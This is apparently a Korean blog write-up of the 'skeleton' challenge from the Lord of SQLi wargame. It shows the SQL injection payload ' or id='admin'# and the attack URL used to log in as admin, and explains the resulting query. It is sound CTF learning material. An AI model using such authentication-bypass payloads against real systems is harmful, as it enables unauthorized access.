
1. 문제풀이
1) 코드 해석
- 이번 문제는 조금 의아한 문제이다 그 이유는 쿼리문뒤에 and 1=0을 넣어서 뭔가 있는것처럼 꾸며놨지만 사실 문제를 푸는데 아무 필요가 없는 구문이다
- 사실 이번문제는 초반문제와 거의 비슷하다 admin이라는 계정으로 접속을 하면 풀리는 문제다
2) 문제 풀이
- 공격 시 삽입 구문: ?pw=' or id='admin'%23
- 공격 후 구문: https://los.rubiya.kr/chall/skeleton_a857a5ab24431d6fb4a00577dac0f39c.php?pw=' or id='admin'%23
- 위와같은 방식으로 공격하면 매우 간단하게 성공한다
- 공격을 수행하면 결과적으로 SQL쿼리문에 다음과 같이 공격 시 삽입 구문이 대입되므로 공격이 성공한다.
select id from prob_skeleton where id='guest' and pw='' or id='admin'#' and 1=0

'Lord of SQLi | WebHacking.kr' 카테고리의 다른 글
Lord of SQLi(#12 darkknight) (0) | 2023.01.05 |
---|---|
Lord of SQLi(#11 golem) (0) | 2023.01.04 |
Lord of SQLi(#9 vampire) (0) | 2023.01.04 |
Lord of SQLi(#8 troll) (0) | 2022.12.30 |
Lord if SQLi(#7 orge) (0) | 2022.12.30 |